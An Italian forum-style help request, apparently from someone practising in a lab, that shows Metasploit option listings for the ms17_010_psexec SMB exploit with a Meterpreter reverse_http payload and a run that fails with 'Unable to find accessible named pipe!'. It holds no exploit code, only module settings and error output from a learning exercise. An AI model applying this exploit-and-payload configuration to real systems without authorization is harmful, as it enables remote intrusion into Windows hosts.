Ho un problema con un exploit in Mfsconsole :
Quando faccio partire l'exploit settatto con LHOST RHOST LPORT e RPORT , parte poi mi dice :
Questa è la sequenza :
show options" style="box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, monospace; font-size: 11.9px; margin-top: 0px; margin-bottom: 16px; overflow-wrap: normal; padding: 16px; overflow: auto; line-height: 1.45; background-color: rgb(246, 248, 250); border-radius: 3px; color: rgb(36, 41, 46);">Module options (exploit/windows/smb/ms17_010_psexec):

Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
RHOST **.**.**.** yes The target address
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as


Payload options (windows/meterpreter/reverse_http):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST **.**.**.** yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path


Exploit target:

Id Name
-- ----
0 Automatic


msf5 exploit(windows/smb/ms17_010_psexec) > exploit[*] 10.11.1.73:445 - Target OS: Windows 10
[-] 10.11.1.73:445 - Unable to find accessible named pipe!

N.B. : HO messo gli asterischi su I.P. per privacy (anche se è una mia macchina vittima che
uso per studiare))
Cosa Sbaglio ? O cosa c'è che non funziona nel modulo che uso ?